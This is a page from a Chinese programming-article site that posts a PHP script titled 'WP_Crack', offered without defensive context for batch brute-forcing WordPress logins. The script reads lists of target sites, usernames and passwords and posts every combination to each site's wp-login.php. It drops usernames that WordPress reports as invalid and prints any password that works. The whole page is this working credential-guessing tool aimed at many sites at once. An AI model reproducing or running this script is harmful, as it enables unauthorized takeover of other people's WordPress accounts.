欢迎您访问程序员文章站本站旨在为大家提供分享程序员计算机编程知识!
您现在的位置是: 首页  >  php教程

WP_Crack(批量爆破Wordpress 账户)

程序员文章站 2022-05-10 20:10:02
...
<?php
$HostList = file('url.txt');
$users    = file('users.txt');
$Psws     = file('pass.txt');

foreach ($HostList as $url)
{
    $url = Trim($url);
	
    $PostUrl = $url.'/wp-login.php';
	$_Path_status_code = GetHttpStatusCode(Trim($PostUrl));
	//echo $PostUrl.' '.$_Path_status_code."\n";
	if ('404' == $_Path_status_code)
	{
	    Continue;
	}

    foreach ($users as $username)
	{
        $username = Trim($username);
	    foreach ($Psws as $now)
	    {
		    $now = Trim($now);
	        $curlPost = 'log='.$username.'&pwd='.urlencode($now);
		    $Rs = POST_Data($PostUrl, $curlPost);
		    $fail_tag = '<strong>'.$username.'</strong>';
		    if (stristr($Rs, '<strong>ERROR</strong>: Invalid username')) # 不存在的用户名跳过猜解
		    {
		        Break;
		    }
            if (!stristr($Rs, $fail_tag))
		    {
		        echo $PostUrl.' '.'Password:'.$now.' # Succed!'."\n";
		    }
	    }
	}


}

     function GetHttpStatusCode($url){ 
         $curl = curl_init();
         curl_setopt($curl,CURLOPT_URL,$url);//获取内容url 
         curl_setopt($curl,CURLOPT_HEADER,1);//获取http头信息 
         curl_setopt($curl,CURLOPT_NOBODY,1);//不返回html的body信息 
         curl_setopt($curl,CURLOPT_RETURNTRANSFER,1);//返回数据流,不直接输出 
         curl_setopt($curl,CURLOPT_TIMEOUT,3); //超时时长,单位秒 
         curl_exec($curl);
         $rtn= curl_getinfo($curl,CURLINFO_HTTP_CODE);
         curl_close($curl);
         return  $rtn;
     }


function POST_Data($PostUrl, $DATA)
{
    $ch = curl_init();//初始化curl
    curl_setopt($ch,CURLOPT_URL, $PostUrl);//抓取指定网页
    curl_setopt($ch, CURLOPT_HEADER, 0);//设置header
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);//要求结果为字符串且输出到屏幕上
    curl_setopt($ch, CURLOPT_POST, 1);//post提交方式
    curl_setopt($ch, CURLOPT_POSTFIELDS, $DATA);
    $data = curl_exec($ch);//运行curl
    curl_close($ch);
    return $data;//输出结果
}


?>

WP_Crack(批量爆破Wordpress 账户)